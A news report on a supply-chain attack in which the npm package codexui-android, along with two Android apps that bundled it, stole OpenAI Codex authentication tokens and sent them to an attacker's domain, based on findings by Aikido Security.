The widely used Codex npm package misappropriated developer tokens for a duration of one month.

      TL;DRA popular npm package for OpenAI Codex, which has 29,000 weekly downloads, has been stealing developer authentication tokens for a month. The same credential-theft scheme was found to operate through two Android apps with over 60,000 combined downloads.

      The npm package appeared legitimate, featuring an active GitHub repository, a consistent development history, and approximately 29,000 weekly downloads. It delivered what it promised to developers using OpenAI Codex: a remote web UI for the AI coding tool. However, for the past month, every use of codexui-android has been silently accessing the user's Codex authentication file and sending it to a server controlled by an attacker. The compromised data includes access tokens, refresh tokens, ID tokens, and account IDs, allowing an attacker to impersonate the developer indefinitely. “The refresh_token doesn’t expire,” noted Aikido Security researcher Charlie Eriksen, adding, “An attacker holding it can silently impersonate you indefinitely.”

      How it functioned

      The attack was notably sophisticated for a compromise of the npm supply chain. Unlike typical supply chain attacks that depend on typosquatting or temporary packages, codexui-android was a functioning tool under active development. Its GitHub repository appeared clean, with malicious code solely present in the npm build.

      The package extracts the contents of Codex’s ~/.codex/auth.json file, a plaintext credential cache created when a user logs in through the Codex app, CLI, or IDE extension. It then transmits those credentials to sentry.anyclaw[.]store, a server name designed to mimic Sentry, a legitimate error-tracking platform. The harmful functionality was introduced roughly a month after the package's initial publication, which is a common tactic for establishing user trust prior to deploying a harmful payload. WHOIS records reveal that the exfiltration domain was registered on April 12, 2026, just two days after the first package version (0.1.72) was uploaded to npm. The malicious code emerged from version 0.1.82 onward.

      The same attack in the Play Store

      The npm package was not the only method of distribution. Aikido discovered that an Android app called OpenClaw Codex Claude AI Agent, created by a developer named BrutalStrike, was using the same npm package within a PRoot sandbox on users’ devices. This app had gained over 50,000 downloads on Google Play.

      Another app by BrutalStrike, named Codex, had more than 10,000 downloads and included the same exfiltration mechanism. Neither app fixed a specific npm package version, causing them to automatically utilize whatever was currently available, permitting the malicious code to reach mobile users as soon as it went live.

      With approximately 29,000 weekly npm downloads plus over 60,000 mobile installations, this incident represents one of the more significant credential-theft operations targeting the AI developer tool ecosystem.

      The author’s changing narrative

      The npm account associated with the package is owned by “friuns,” identified by Aikido as Igor Levochkin. When approached on GitHub, the author first claimed to have lost access to the npm account, later amending this to say they were “currently investigating this issue internally.”

      Levochkin asserted that no credential data was shared with third parties but did not clarify why the exfiltration code was embedded only in the npm build or the reason for accessing users’ Codex tokens. The X profile linked to the account includes the domain anyclaw[.]store, the same domain to which the stolen tokens were sent.

      A growing trend

      This attack occurs during a rise in threats against AI developer tools. Recently, a compromised VS Code extension breached GitHub’s internal repositories, exfiltrating 3,800 repositories after an employee installed the malicious package. This attack, linked to the group TeamPCP, extracted credentials from 1Password vaults, Claude Code configurations, and AWS.

      The takeaway from both incidents is consistent: as AI coding tools become essential infrastructure, the authentication tokens they generate—and often store in plaintext—become prime targets. OpenAI’s documentation warns developers to treat ~/.codex/auth.json like a password. The codexui-android campaign exemplifies the consequences of ignoring this advice and how tools that developers trust can be designed to exploit that trust.

      Aikido has also reported that deleted Google API keys can remain active for up to 23 minutes post-revocation, a timeframe that attackers could exploit to access user data and Gemini conversations. Google has subsequently categorized the issue as a P0 bug. This finding highlights a broader concern: credential revocation in cloud environments often lacks the immediacy that defenders assume.